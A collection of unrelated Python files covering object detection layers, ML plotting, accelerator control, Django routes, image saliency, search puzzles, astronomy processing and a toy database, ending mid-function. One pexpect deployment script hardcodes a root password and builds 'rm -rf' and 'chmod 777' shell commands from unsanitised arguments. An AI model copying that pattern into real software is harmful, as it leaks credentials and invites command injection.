def make_loc_conf(num_classes=21, bbox_aspect_num=(4, 6, 6, 6, 4, 4)):
loc_layers = []
cnf_layers = []
# VGG
# (source1) 22層目conv4_3 に対する畳み込み層
loc_layers += [nn.Conv2d(512, bbox_aspect_num[0] * 4, kernel_size=3, padding=1)]
cnf_layers += [nn.Conv2d(512, bbox_aspect_num[0] * num_classes, kernel_size=3, padding=1)]
# (source2) 最終層に対する畳み込み層
loc_layers += [nn.Conv2d(1024, bbox_aspect_num[1] * 4, kernel_size=3, padding=1)]
cnf_layers += [nn.Conv2d(1024, bbox_aspect_num[1] * num_classes, kernel_size=3, padding=1)]
# extras
# (source3)
loc_layers += [nn.Conv2d(512, bbox_aspect_num[2] * 4, kernel_size=3, padding=1)]
cnf_layers += [nn.Conv2d(512, bbox_aspect_num[2] * num_classes, kernel_size=3, padding=1)]
# (source4)
loc_layers += [nn.Conv2d(256, bbox_aspect_num[3] * 4, kernel_size=3, padding=1)]
cnf_layers += [nn.Conv2d(256, bbox_aspect_num[3] * num_classes, kernel_size=3, padding=1)]
# (source5)
loc_layers += [nn.Conv2d(256, bbox_aspect_num[4] * 4, kernel_size=3, padding=1)]
cnf_layers += [nn.Conv2d(256, bbox_aspect_num[4] * num_classes, kernel_size=3, padding=1)]
# (source6)
loc_layers += [nn.Conv2d(256, bbox_aspect_num[5] * 4, kernel_size=3, padding=1)]
cnf_layers += [nn.Conv2d(256, bbox_aspect_num[5] * num_classes, kernel_size=3, padding=1)]
return nn.ModuleList(loc_layers), nn.ModuleList(cnf_layers)
class L2Norm(nn.Module):
def __init__(self, input_channels=512, scale=20):
super(L2Norm, self).__init__() # 親クラスのコンストラクタ実行
self.weight = nn.Parameter(torch.Tensor(input_channels))
self.scale = scale # 係数weightの初期値として設定する値
self.reset_parameters() # パラメータの初期化
self.eps = 1e-10
def reset_parameters(self):
init.constant_(self.weight, self.scale) # weightの値がすべてscale(=20)になる
def forward(self, x):
norm = x.pow(2).sum(dim=1, keepdim=True).sqrt() + self.eps
x = torch.div(x, norm)
weights = self.weight.unsqueeze(
0).unsqueeze(2).unsqueeze(3).expand_as(x)
out = weights * x
return out
|
import matplotlib as plt
import pandas as pd
import numpy as np
import sklearn.metrics as metrics
from sklearn.metrics import accuracy_score
from sklearn.metrics import f1_score
from sklearn.metrics import precision_score
from sklearn.metrics import recall_score
from sklearn.model_selection import learning_curve
from sklearn.tree import DecisionTreeClassifier
def model_eval(y_test, y_pred):
f1 = f1_score(y_test, y_pred)
precision = precision_score(y_test, y_pred)
recall = recall_score(y_test, y_pred)
acc = accuracy_score(y_test, y_pred)
print(f"F1 score: {round(f1, 4)}"),
print(f"Precision: {round(precision, 4)}"),
print(f"Recall: {round(recall, 4)}"),
print(f"Accuracy: {round(acc, 4)}"),
return
def plot_learning_curve(X, y, maxdepth, plt):
# create cv training and test scores for various training set sizes
train_sizes, train_scores, test_scores = learning_curve(
DecisionTreeClassifier(max_depth=maxdepth, random_state=42),
X, # feature matrix
y, # target vector
cv=5, # number of folds in cross-validation
scoring="f1", # metric
#scoring="neg_mean_squared_error", # metric
n_jobs=-1, # use all computer cores,
train_sizes=np.linspace(
0.01, 1.0, 30
), # 30 different sizes of the training set
)
# create means and standart deviations of training set scores
train_mean = np.mean(train_scores, axis=1)
train_std = np.std(train_scores, axis=1)
# create means and standart deviations of test set scores
test_mean = np.mean(test_scores, axis=1)
test_std = np.std(test_scores, axis=1)
# draw lines
plt.plot(train_sizes, train_mean, "--", color="#111111", label="Training score")
plt.plot(train_sizes, test_mean, color="#111111", label="Cross-validation score")
# draw bands
plt.fill_between(
train_sizes, train_mean - train_std, train_mean + train_std, color="#DDDDDD"
)
plt.fill_between(
train_sizes, test_mean - test_std, test_mean + test_std, color="#f4d0d7"
)
# create plot
plt.title("Learning curve for Decision Tree")
plt.xlabel("Training set size", fontsize=18)
plt.ylabel("F1 score", fontsize=18)
plt.legend(loc="best")
plt.tight_layout()
return
|
# Helper classes for TMBF control
import cothread
from cothread.catools import *
class TMBF:
def __init__(self, name):
self.tmbf = name
self.s1 = Trigger(self, 'S1')
self.s2 = Trigger(self, 'S2')
self.ext = Trigger(self, 'EXT')
self.saves = {}
def pv(self, name):
return '%s:%s' % (self.tmbf, name)
def PV(self, name):
return PV(self.pv(name))
def set_save(self, name, value):
self.saves[name] = self.get(name)
caput(self.pv(name), value, wait=True)
def set(self, name, value):
caput(self.pv(name), value, wait=True)
def get(self, name):
return caget(self.pv(name), format = FORMAT_TIME)
def monitor(self, name, on_update, **kargs):
return camonitor(self.pv(name), on_update, **kargs)
def restore_saved(self):
for name, value in self.saves.items():
self.set(name, value)
def reset_saved(self):
self.saves = {}
class Trigger:
def __init__(self, tmbf, trigger):
assert trigger in ['S1', 'S2', 'EXT']
self.tmbf = tmbf
self.trigger = trigger
tmbf.monitor('TRG:%s:STATUS' % trigger,
self.__update_status, datatype = str, all_updates = True)
self.state = 'Unknown'
self.event = cothread.Event()
def __update_status(self, value):
self.state = value
self.event.Signal()
def wait_for(self, state, timeout=5):
timeout = cothread.AbsTimeout(timeout)
while self.state != state:
self.event.Wait(timeout)
def arm(self, timeout=5):
timeout = cothread.AbsTimeout(timeout)
self.state = 'Waiting'
arm_name = {'S1':'FIRE', 'S2':'FIRE', 'EXT':'ARM'}[self.trigger]
self.tmbf.set('TRG:%s:%s_S.PROC' % (self.trigger, arm_name), 0)
self.wait_for('Busy', timeout)
self.wait_for('Ready', timeout)
|
from django.urls import path
from .views import ArticleListView, ArticleDetailView
urlpatterns = [
path('list/', ArticleListView.as_view(), name='list_of_articles'),
path('<int:pk>/', ArticleDetailView.as_view(), name='article_detail'),
path()
]
|
import cv2
import numpy as np
from matplotlib import pyplot as plt
class Saliency:
"""Generate saliency map from RGB images with the spectral residual method
This class implements an algorithm that is based on the spectral
residual approach (Hou & Zhang, 2007).
"""
def __init__(self, img, use_numpy_fft=True, gauss_kernel=(5, 5)):
"""Constructor
This method initializes the saliency algorithm.
:param img: an RGB input image
:param use_numpy_fft: flag whether to use NumPy's FFT (True) or
OpenCV's FFT (False)
:param gauss_kernel: Kernel size for Gaussian blur
"""
self.use_numpy_fft = use_numpy_fft
self.gauss_kernel = gauss_kernel
self.frame_orig = img
# downsample image for processing
self.small_shape = (64, 64)
self.frame_small = cv2.resize(img, self.small_shape[1::-1])
# whether we need to do the math (True) or it has already
# been done (False)
self.need_saliency_map = True
def get_saliency_map(self):
"""Returns a saliency map
This method generates a saliency map for the image that was
passed to the class constructor.
:returns: grayscale saliency map
"""
if self.need_saliency_map:
# haven't calculated saliency map for this image yet
num_channels = 1
if len(self.frame_orig.shape) == 2:
# single channel
sal = self._get_channel_sal_magn(self.frame_small)
else:
# multiple channels: consider each channel independently
sal = np.zeros_like(self.frame_small).astype(np.float32)
for c in xrange(self.frame_small.shape[2]):
small = self.frame_small[:, :, c]
sal[:, :, c] = self._get_channel_sal_magn(small)
# overall saliency: channel mean
sal = np.mean(sal, 2)
# postprocess: blur, square, and normalize
if self.gauss_kernel is not None:
sal = cv2.GaussianBlur(sal, self.gauss_kernel, sigmaX=8,
sigmaY=0)
sal = sal**2
sal = np.float32(sal) / np.max(sal)
# scale up
sal = cv2.resize(sal, self.frame_orig.shape[1::-1])
# store a copy so we do the work only once per frame
self.saliencyMap = sal
self.need_saliency_map = False
return self.saliencyMap
def _get_channel_sal_magn(self, channel):
"""Returns the log-magnitude of the Fourier spectrum
This method calculates the log-magnitude of the Fourier spectrum
of a single-channel image. This image could be a regular grayscale
image, or a single color channel of an RGB image.
:param channel: single-channel input image
:returns: log-magnitude of Fourier spectrum
"""
# do FFT and get log-spectrum
if self.use_numpy_fft:
img_dft = np.fft.fft2(channel)
magnitude, angle = cv2.cartToPolar(np.real(img_dft),
np.imag(img_dft))
else:
img_dft = cv2.dft(np.float32(channel),
flags=cv2.DFT_COMPLEX_OUTPUT)
magnitude, angle = cv2.cartToPolar(img_dft[:, :, 0],
img_dft[:, :, 1])
# get log amplitude
log_ampl = np.log10(magnitude.clip(min=1e-9))
# blur log amplitude with avg filter
log_ampl_blur = cv2.blur(log_ampl, (3, 3))
# residual
residual = np.exp(log_ampl - log_ampl_blur)
# back to cartesian frequency domain
if self.use_numpy_fft:
real_part, imag_part = cv2.polarToCart(residual, angle)
img_combined = np.fft.ifft2(real_part + 1j * imag_part)
magnitude, _ = cv2.cartToPolar(np.real(img_combined),
np.imag(img_combined))
else:
img_dft[:, :, 0], img_dft[:, :, 1] = cv2.polarToCart(residual,
angle)
img_combined = cv2.idft(img_dft)
magnitude, _ = cv2.cartToPolar(img_combined[:, :, 0],
img_combined[:, :, 1])
return magnitude
def get_proto_objects_map(self, use_otsu=True):
"""Returns the proto-objects map of an RGB image
This method generates a proto-objects map of an RGB image.
Proto-objects are saliency hot spots, generated by thresholding
the saliency map.
:param use_otsu: flag whether to use Otsu thresholding (True) or
a hardcoded threshold value (False)
:returns: proto-objects map
"""
saliency = self.get_saliency_map()
if use_otsu:
_, img_objects = cv2.threshold(np.uint8(saliency * 255), 0, 255,
cv2.THRESH_BINARY + cv2.THRESH_OTSU)
else:
thresh = np.mean(saliency) * 255 * 3
_, img_objects = cv2.threshold(np.uint8(saliency * 255), thresh, 255,
cv2.THRESH_BINARY)
return img_objects
|
import sys, re,time
#from pexpect import *
import sys,os
sys.path.append(os.path.join(os.path.abspath(os.path.dirname(__file__)), 'sharedlib'))
import getpass, re, time
from sharedlib.sitepackages import pexpect
print len(sys.argv)
size = 7
try:
if sys.argv[1] == "-h" or sys.argv[1] == "--help":
print """
TransferSegmenter <file_path_name_of_tar> <file_name_to_copy> <host_ip> <host_user> <host_password> <host_file_path_name>
Ex TransferSegmenter /home/release.tar.gz azuki root 10.100.25.19 /home/jenkins_build ******
"""
else:
"""
Logging in to the Server PC where the streams are kept
"""
if len(sys.argv) == int(size):
path_filename = sys.argv[1]
username = sys.argv[3]
hostname = sys.argv[4]
remotepath = sys.argv[5]
password = sys.argv[6]
filename = path_filename.split('/')[-1]
binary_name = sys.argv[2]
print path_filename,filename,username,hostname,remotepath,password
#print check
child1=pexpect.spawn( "scp "+path_filename+" "+username+"@"+hostname+":/"+remotepath+"/" )
try:
child1.expect ( "password" )
except:
child1.expect ( '(yes/no)' )
child1.sendline ( "yes" )
child1.expect ( 'password' )
child1.sendline ( ""+password+"\n" )
child2=pexpect.spawn( "ssh "+username+"@"+hostname+"" )
try:
child2.expect ( "password" )
except:
child2.expect ( '(yes/no)' )
child2.sendline ( "yes" )
child2.expect ( 'password' )
child2.sendline ( ""+password+"\n" )
child2.close()
child3=pexpect.spawn( "ssh root@127.0.0.1" )
try:
child3.expect ( "password" )
except:
child3.expect ( '(yes/no)' )
child3.sendline ( "yes" )
child3.expect ( 'password' )
child3.sendline ( "rebaca\n" )
child3.close()
(check, exitstatus) = run("ssh root@127.0.0.1 'ps aux | grep [s]cp | grep "+remotepath+"",events={'(?i)password':'rebaca\n'}, withexitstatus=1)
#print check
text_found = re.search(r""+remotepath+"", check)
#print text_found
while(text_found != None):
#print "start"
(capture, exitstatus) = run("ssh root@127.0.0.1 'ps aux | grep [s]cp | grep "+remotepath+"'",events={'(?i)password':'rebaca\n'}, withexitstatus=1)
print "copy in progress............."
text_found = re.search(r""+remotepath+"", capture)
time.sleep(2)
try:
(check, exitstatus) = run("ssh "+username+"@"+hostname+" 'ls -lah "+remotepath+"/ | grep "+filename+"'",events={'(?i)password':''+password+'\n'}, withexitstatus=1)
except:
print "permission issue"
#print check
text_found = re.search(r""+filename+"", check)
#print text_found
if (text_found != None):
print "File Copied Successfully"
else:
print "File Not Copied"
"""
checking for the type of compression format
"""
compress_format_zip = re.search(r".zip", filename)
compress_format_tar_gz = re.search(r".tar.gz", filename)
compress_format_tgz = re.search(r".tgz", filename)
compress_format_rar = re.search(r".rar", filename)
if compress_format_zip != None:
(check, exitstatus) = run("ssh "+username+"@"+hostname+" 'cd "+remotepath+";rm -rf "+filename[:-4]+";unzip "+filename+";cp "+filename[:-4]+"/"+binary_name+" "+remotepath+";rm -rf "+filename+";rm -rf "+filename[:-4]+";chmod 777 "+binary_name+"'",events={'(?i)password':''+password+'\n'}, withexitstatus=1)
if compress_format_tar_gz != None:
(check, exitstatus) = run("ssh "+username+"@"+hostname+" 'cd "+remotepath+";rm -rf "+filename[:-7]+";tar -xvzf "+filename+";cp "+filename[:-7]+"/"+binary_name+" .;rm -rf "+filename+";rm -rf "+filename[:-7]+";chmod 777 "+binary_name+"'",events={'(?i)password':''+password+'\n'}, withexitstatus=1)
elif compress_format_tgz != None:
(check, exitstatus) = run("ssh "+username+"@"+hostname+" 'cd "+remotepath+";rm -rf "+filename[:-4]+";tar -xvzf "+filename+";cp "+filename[:-4]+"/"+binary_name+" .;rm -rf "+filename+";rm -rf "+filename[:-4]+";chmod 777 "+binary_name+"'",events={'(?i)password':''+password+'\n'}, withexitstatus=1)
elif compress_format_rar != None:
(check, exitstatus) = run("ssh "+username+"@"+hostname+" 'cd "+remotepath+";rm -rf "+filename[:-4]+";unrar e "+filename+";cp "+filename[:-4]+"/"+binary_name+" .;rm -rf "+filename+";rm -rf "+filename[:-4]+";chmod 777 "+binary_name+"'",events={'(?i)password':''+password+'\n'}, withexitstatus=1)
else:
print "NO format matched"
#print check
#(check, exitstatus) = run("ssh "+username_AS+"@"+hostname_AS+" '"+automation_command+"'",events={'(?i)password':''+password+'\n'}, withexitstatus=1)
child1.close()
else:
print "please provide complete command"
except:
print "Command line argument are not complete OR you have quited in between"
|
import header as h
def add_nodes(g, nodes):
for el in nodes:
g[el]=dict() #add a list of node prom 1 to the max number of nodes
#g.add_nodes_from(list(range(1, h.NUM_VERTEX+1)))#add a list of node prom 1 to the max number of nodes
def add_phisical_distance_edges(g):
with open(h.PATH_DISTANCE, 'r') as distances:
for row in distances:
row=row[2:]#remove the inizial 'a'
comp=list(map(int, row.split()))
adj=g.get(comp[0])
if adj==None:
g[comp[0]]={comp[1]:comp[2]}
else:
g[comp[0]][comp[1]]=comp[2]
#g.add_edge(comp[0], comp[1], weight=comp[2])
def add_time_distance_edges(g):
with open(h.PATH_TIME, 'r') as times:
for row in times:
row=row[2:]#remove the inizial 'a'
comp=list(map(int, row.split()))
adj=g.get(comp[0])
if adj==None:
g[comp[0]]={comp[1]:comp[2]}
else:
g[comp[0]][comp[1]]=comp[2]
#g.add_edge(component[0], component[1], weight=component[2])
def add_network_distance_edges(g):
with open(h.PATH_TIME, 'r') as times:
for row in times:
row=row[2:]#remove the inizial 'a'
comp=list(map(int, row.split()))
adj=g.get(comp[0])
if adj==None:
g[comp[0]]={comp[1]:1}
else:
g[comp[0]][comp[1]]=1
#g.add_edge(component[0], component[1], weight=1)
|
"""
This module exposes an endpoint to retrieve stats for the API requests
"""
import json
from flask import Response, Blueprint
from utils import DB
STATS_BLUEPRINT = Blueprint('stats', __name__)
@STATS_BLUEPRINT.route('/api/v1/stats', methods=['GET'])
def stats():
"""
This function returns the API stats
"""
queries = {}
slow_requests = {}
# Retrieve items from MongoDB
query_items = DB.queries.find()
slow_queries = DB.slow_requests.find()
# Create a dict from the data retrieved
for item in query_items:
queries[item['url']] = item['count']
for item in slow_queries:
slow_requests[item['url']] = item['time']
resp = {
'slow_requests': slow_requests,
'queries': queries
}
return Response(json.dumps(resp), status=200, mimetype='application/json')
|
import Common
def getNewNodes(cur, vis):
nodes = []
nodes.append(Node(mod(cur.curState, 'u'), cur, cur.depth +1))
nodes.append(Node(mod(cur.curState, 'r'), cur, cur.depth +1))
nodes.append(Node(mod(cur.curState, 'd'), cur, cur.depth +1))
nodes.append(Node(mod(cur.curState, 'l'), cur, cur.depth +1))
nodes = [node for node in nodes if node.curState != None and stateToHash(node.curState) not in vis]
return nodes
def display_board( state ):
print "-------------"
print "| %i | %i | %i |" % (state[0][0], state[0][1], state[0][2])
print "-------------"
print "| %i | %i | %i |" % (state[1][0], state[1][1], state[1][2])
print "-------------"
print "| %i | %i | %i |" % (state[2][0], state[2][1], state[2][2])
print "------------"
def getPath(node):
temp = node
moves = []
while temp != None:
moves.insert(0, temp.curState)
temp = temp.parent
return moves
def dfs(start, goal, depth):
nodes = []
nodes.insert(0, Node(start, None, 0))
visited = []
count = 0
while True:
if len(nodes) == 0:
return {'node':None, 'count':count }
node = nodes.pop()
if node.curState == goal:
return {'node':node, 'count':count }
visited.append(stateToHash(node.curState))
if node.depth < depth :
newNodes = getNewNodes(node, visited)
count = count + 1
newNodes.extend(nodes)
nodes = newNodes
def idfs(start, goal):
count = 0
for i in range(0, 32):
solution = dfs(start, goal, i)
count = count + solution['count']
if solution['node'] != None:
for step in getPath(solution['node']):
display_board(step)
print "solution found at depth %i" % (i)
print "Expanded %i nodes " % (count)
return
print "No solution found for depth range [0,32]"
print "Expanded %i nodes " % (count)
def dfs_main(start, goal):
solution = dfs(start, goal, 32)
for step in getPath(solution['node']):
display_board(step)
print "Expanded %i nodes " % (solution['count'])
class Node:
def __init__( self, state, parent, depth):
self.curState = state
self.parent = parent
self.depth = depth
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 12 14:00:59 2017
Code for degrading images
@author: ppxee
"""
### Import required libraries ###
#import matplotlib.pyplot as plt #for plotting
from astropy.io import fits #for handling fits
import numpy as np #for handling arrays
from astropy.convolution import Gaussian2DKernel
from astropy.convolution import convolve
#from scipy import ndimage
#import math
#from astropy.stats import median_absolute_deviation
def FWHM2sigma(FWHM):
''' Function to convert the FWHM of a distribution into a sigma for that
distribution. It assumes the distribution is gaussian.
Input:
FWHM = Full width half maximum of a distriubtution (in my case usually
of an object from SExtractor)
Output:
sigma = standard deviation value of a guassian distribution with the
given FWHM. This roughly equates to the psf of the object. '''
hdr08B = fits.getheader('UDS_08B_K.fits')
const = hdr08B['CD1_1'] # constant that defines unit conversion for FWHM
FWHM /= const
return FWHM/np.sqrt(8*np.log(2))
sem05B = fits.open('SE_outputs_yearstacks/05B_output.fits')[1].data
sem07B = fits.open('SE_outputs_yearstacks/07B_output.fits')[1].data
sem08B = fits.open('SE_outputs_yearstacks/08B_output.fits')[1].data
sem09B = fits.open('SE_outputs_yearstacks/09B_output.fits')[1].data
sem10B = fits.open('SE_outputs_yearstacks/10B_output.fits')[1].data
sem11B = fits.open('SE_outputs_yearstacks/11B_output.fits')[1].data
sem12B = fits.open('SE_outputs_yearstacks/12B_output.fits')[1].data
#sem05B = fits.open('05B_output.fits')[1].data
#sem07B = fits.open('07B_output.fits')[1].data
#sem08B = fits.open('08B_output.fits')[1].data
#sem09B = fits.open('09B_output.fits')[1].data
#sem10B = fits.open('10B_output.fits')[1].data
#sem11B = fits.open('11B_output.fits')[1].data
#sem12B = fits.open('12B_output.fits')[1].data
colname = 'FWHM_WORLD'
#Put data in array
avgFWHM = np.array([np.mean(sem05B[colname]), np.mean(sem07B[colname]),
np.mean(sem08B[colname]), np.mean(sem09B[colname]),
np.mean(sem10B[colname]), np.mean(sem11B[colname]),
np.mean(sem12B[colname])])
### Find maximum FWHM as this is what all the others willl become ###
aimind = np.argmax(avgFWHM)
### Convert FWHM into a sigma ###
sigmaold = np.array([FWHM2sigma(fwhm) for fwhm in avgFWHM])
sigmabroad = sigmaold[aimind]
### Find required sigma ###
# sigker^2 = sigbroad^2 - signar^2
sigmakernel = np.array([np.sqrt(sigmabroad**2 - sigma**2) for sigma in sigmaold])
### Open images ###
#im05Bfull = fits.open('UDS_05B_K_bin2x2.fits', memmap=True)
#im05B = im05Bfull[0].data
#hdr = im05Bfull[0].header
### Convolve Images ###
kernel05B = Gaussian2DKernel(sigmakernel[0])
#newim05B = convolve(im05B, kernel05B)
#im05Bfull[0].data = newim05B
### Save the file ###
#hdu = fits.PrimaryHDU(newim05B, header=hdr)
#hdulist = fits.HDUList([hdu])
#hdulist.writeto('new_UDS_05B_K_bin2x2.fits', overwrite=True)
#
#### CLose the file ###
#im05Bfull.close()
#del im05Bfull[0].data
|
import os
import threading
# Global Setting for the Database
# PageSize, StartRID, etc..
# Element(byte, byte, byte, byte, byte, byte, byte, '\x00') # 8 "bytes" in one "element" Note that only 7 of the bytes can be written to!
# PhysicalPage(Element, Element, Element, ...) # 512 "element"s in one "PhysicalPage"
# BasePage(PhysicalPage, PhysicalPage, PhysicalPage, ...) # 9 (4 are meta filled, 5 are data filled) "PhysicalPage"s in one "BasePage"
# PageRange(BasePage, BasePage, BasePage, ...) # 16 "BasePage"s in one "PageRange"
def init():
pass
BytesPerElement = 8
PhysicalPageBytes = 4096
# aka records per base page
ElementsPerPhysicalPage = int(PhysicalPageBytes / BytesPerElement)
MetaElements = 4
# When we get 10 filled up tail pages, merge
MergePolicy = 25
PagesPerPageRange = 16
# records per base page * number of base pages per range = records per page range
RecordsPerPageRange = int(PagesPerPageRange * ElementsPerPhysicalPage)
BufferpoolSize = 16
INVALID = 72057594037927935 #(max int for 7 byes, Hexadecimal: 0xFFFFFFFFFFFFFF)
threads = []
# global must be defined after class definition (its just under it)
class Bufferpool():
def __init__(self):
self.bufferpool = [None]*BufferpoolSize
self.latch = threading.Lock()
pass
def BufferpoolIsFull(self):
return not any(spot is None for spot in self.bufferpool)
# this way passes in an index
def refresh(self, index):
#Find the Page that has this path in the bufferpool, then refresh its age, and increment the other pages in bufferpool age
for spot in self.bufferpool:
if not spot is None:
if spot.path == self.bufferpool[index].path:
spot.age = 1
spot.pinned += 1
else:
spot.age += 1
return index
def add(self, page):
if (self.BufferpoolIsFull()):
self.kick()
for index, spot in enumerate(self.bufferpool):
if spot is None:
self.bufferpool[index] = page
self.refresh(index) #on the way in, we set the age to 1 and update the other ages
return index
raise Exception("Bufferpool Error: couldn't find empty spot after kicking.")
def kick(self):
oldest = 0 # note that the minimum age is 1
for index, spot in enumerate(self.bufferpool):
if not spot is None:
if (spot.pinned == 0):
if(self.bufferpool[index].age > oldest):
oldest = self.bufferpool[index].age
index_oldest = index
if oldest == 0:
raise Exception("Bufferpool Error: all pages in the bufferpool are pinned.")
kicked = self.bufferpool[index_oldest]
kicked.age = 1 #on the way out, we set the age to 1
self.bufferpool[index_oldest] = None
if (kicked.dirty):
if not os.path.exists(kicked.path):
os.mkdir(kicked.path)
kicked.writePageToDisk(kicked.path)
def kickAll(self):
empty = [None]*BufferpoolSize
while self.bufferpool != empty:
self.kick()
def pathInBP(self, path):
for index, spot in enumerate(self.bufferpool):
if not spot is None:
if (spot.path == path):
return index
return None
global BP
BP = Bufferpool()
# whole record locked from base record
class RecordLock():
def __init__(self):
self.sLocks = 0
self.xLocks = 0
self.isShrinking = False
self.inUseBy = []
# lock then unlock all functions since they are critical sections in a shared data structure
class LockManager():
def __init__(self):
# hash table mapping RIDs to list of S lock, X lock, bool isShrinkingPhase
# - if we see there's already an exclusive lock on that RID, we abort
# - otherwise, increment number of shared locks
self.latch = threading.Lock()
self.KeytoLocks = {}
self.transactionID = -1 # number of transactions holding a lock
def getTransactionID(self):
self.transactionID += 1
return self.transactionID
# return false if X lock already present or we're in shrinking phase
# - once one shared lock is given up, all of them have to be given up before more can be given out
# i. This is so Xlocks can be given out at some point
def obtainSLock(self, Key, transactionID):
giveLock = False
if Key not in self.KeytoLocks:
self.KeytoLocks[Key] = RecordLock()
self.KeytoLocks[Key].sLocks += 1
self.KeytoLocks[Key].inUseBy.append(transactionID)
# already has lock
return True
if self.KeytoLocks[Key].isShrinking:
# cannot give lock when lock is shrinking
return False
# if there is not an xLock
if self.KeytoLocks[Key].xLocks == 0:
if transactionID not in self.KeytoLocks[Key].inUseBy:
self.KeytoLocks[Key].inUseBy.append(transactionID)
self.KeytoLocks[Key].sLocks += 1
giveLock = True
# if there is an xLock
elif self.KeytoLocks[Key].xLocks == 1:
if transactionID in self.KeytoLocks[Key].inUseBy:
self.KeytoLocks[Key].sLocks += 1
giveLock = True
return giveLock
# return false if X or S lock already present
def obtainXLock(self, Key, transactionID):
giveLock = False
if Key not in self.KeytoLocks:
self.KeytoLocks[Key] = RecordLock()
self.KeytoLocks[Key].xLocks = 1
self.KeytoLocks[Key].inUseBy.append(transactionID)
return True
if self.KeytoLocks[Key].isShrinking:
# cannot give lock when lock is shrinking
return False
#if there are no X locks
if self.KeytoLocks[Key].xLocks == 0:
# and no S locks, give out loc
if self.KeytoLocks[Key].sLocks == 0:
self.KeytoLocks[Key].xLocks = 1
self.KeytoLocks[Key].inUseBy.append(transactionID)
giveLock = True
# and there is an s Lock, then check what's using lock
elif self.KeytoLocks[Key].sLocks == 1:
if transactionID in self.KeytoLocks[Key].inUseBy:
self.KeytoLocks[Key].xLocks = 1
self.KeytoLocks[Key].inUseBy.append(transactionID)
giveLock = True
# if there is an x lock already then any s locks are from the same transaction
elif self.KeytoLocks[Key].xLocks == 1:
if transactionID in self.KeytoLocks[Key].inUseBy:
giveLock = True
return giveLock
# Initiate shrinking phase
# If num S locks == 0, set shrinkingPhase to false
def giveUpSLock(self, Key, transactionID):
removeLock = False
if Key not in self.KeytoLocks:
return True
if (self.KeytoLocks[Key].sLocks > 0):
self.KeytoLocks[Key].isShrinking = True
if transactionID in self.KeytoLocks[Key].inUseBy:
self.KeytoLocks[Key].inUseBy.remove(transactionID)
self.KeytoLocks[Key].sLocks = self.KeytoLocks[Key].sLocks - 1
if (self.KeytoLocks[Key].sLocks == 0):
self.KeytoLocks[Key].isShrinking = False
removeLock = True
return removeLock
def giveUpXLock(self, Key, transactionID):
removeLock = False
if Key not in self.KeytoLocks:
return True
if (self.KeytoLocks[Key].xLocks == 1):
if transactionID in self.KeytoLocks[Key].inUseBy:
self.KeytoLocks[Key].inUseBy.remove(transactionID)
self.KeytoLocks[Key].xLocks = 0
removeLock = True
return removeLock
global LM
LM = LockManager()
|
# File: proj2.py
# Author: Joel Okpara
# Date: 5/9/16
# Section: 04
# E-mail: joelo1@umbc.edu
# Description: Finds words on a word search using the puzzle and word list given
REFERENCE = [-1,0,1] #values used in a dictionary reference system
#inputVal() validates that the user is inputting a .txt file
#Input: A file chosen by the user
#Output: Whether or not it's a .txt file
def inputVal(aFile):
if (aFile[-4:] != ".txt"):
return False
else:
return True
#printFile() prints the contents of the file given to the screen
#This function is mainly just to let the user see the puzzle and word list
#Input: A file
#Output: Contents printed to screen
def printFile(aFile):
for l in aFile:
print(l.strip())
#make2D() makes the unseen 2D list that we will search through for words
#Input: The puzzle file chosen by the user
#Output: a 2D list of the puzzle
def make2D(aFile):
aList = []
for l in aFile:
aList.append(l.strip().split())
return aList
#findFirst() finds the first letter of the word in the puzzle file
#then searches in every direction in order to find the rest of the word
#Input: The word, the puzzle grid, the current row and column, and the row and column directions to look in
#Output: Whether or not the whole word is found
def findWord(word, list2D, row, col, rowDir, colDir):
#would normally be len(word) == 0, but I never stripped the whitespace so len(word) will never be 0
if (len(word) == 1):
return True
#Makes sure that the "cursor" stays within the grids boundaries
if (row < 0 or row > len(list2D) - 1) or (col < 0 or col > len(list2D[row]) - 1):
return False
#If the first letter of given word is in the 2d list
if (word[0] == list2D[row][col]):
#call the function again starting at the next letter, add the direction numbers in order to search in
#all 8 directions
return findWord(word[1:], list2D, row + rowDir, col + colDir, rowDir, colDir)
return False
#directionCheck() checks figures out which direction the word went in based on what numbers we added or
#subtracted to the rows and columns in order to find the word
#Input: the word and 2D list
#Output: Whether the word was found, the key to the direction diictionary, and the row/ column coordinates
def directionCheck(word, list2D):
for r in range(0,len(list2D)): #for each row coordinate
for c in range(0,len(list2D[r])): #for each column coordinate
for clmDir in REFERENCE: #for each column direction(left a column, stay in same column ,right a column)
for rwDir in REFERENCE: #for each row direction(up a row, stay in same row, down a row)
if findWord(word, list2D, r, c, rwDir, clmDir) == True: #if we found the word
#put the numbers we used to find the word together to make the keys for a dictionary
dirKey = "{row}{col}".format(row = rwDir, col = clmDir)
#return (wordFound, Key for the dictionary, row/colum coordinates
return True, dirKey, r, c
else:
return False, None, None, None
def main():
#Input the puzzle you want to find from
puzzInput = input("What puzzlefile would you like to use? ")
while inputVal(puzzInput) != True:
puzzInput = input("invalid file name, try again: ")
#Input the word list that you want to find
wordInput = input("What word list file would you like to use? ")
while inputVal(wordInput) != True:
wordInput = input("invalid file name, try again: ")
#File I/O
puzzFile = open(puzzInput)
wordFile = open(wordInput)
puzzList = puzzFile.readlines()
wordList = wordFile.readlines()
#Print puzzle and word list to screen
print("\nHere is the word search")
printFile(puzzList)
print()
print("Here is the word list")
printFile(wordList)
print()
# assign 2D list to puzz2D
puzz2D = make2D(puzzList)
#dictionary for directional phrases
wordDirections = {"-1-1": "Diagonally Up and Left", "-10":"Up", "-11": "Diagonally Up and Right", "0-1":"Backwards and Left", "01": "Right", "1-1": "Diagonally Down and Left", "10": "Down", "11": "Diagonally Down and Right"}
#################### DICTIONARY LOGIC ####################################################################
#look up a row = -1
#same row = 0
#look down a row = 1
#look left a column = -1
#same column = 0
#look right a column = 1
# So for example if I found a word by adding -1 to the row coordinates and -1 to the column coordinates
# that means the word was going Diagonally Up and Left
#######################################################################################################
for string in wordList: #for each word in my list of words
#assigning the values that I returned from directionCheck() to these variables
wordFound, direction, r, c = directionCheck(string,puzz2D)
if wordFound == True:
print("The word", string.strip(), "starts in", r, ",",c, "and goes", wordDirections[direction])
else:
print("The word", string.strip(), "does not appear in this puzzle")
main()
|
import functools
import torch
import torch.nn as nn
import torch.optim
from torch.nn import init
from torch.optim import lr_scheduler
def conv3x3(inplanes, outplanes, stride=1):
return nn.Conv2d(inplanes, outplanes, kernel_size=3, stride=stride,
padding=1, bias=False)
def get_norm_layer(layer_type='batch'):
if layer_type == 'batch':
norm_layer = functools.partial(nn.BatchNorm2d, affine=True)
elif layer_type == 'instance':
norm_layer = functools.partial(nn.InstanceNorm2d, affine=False)
elif layer_type == 'none':
norm_layer = None
else:
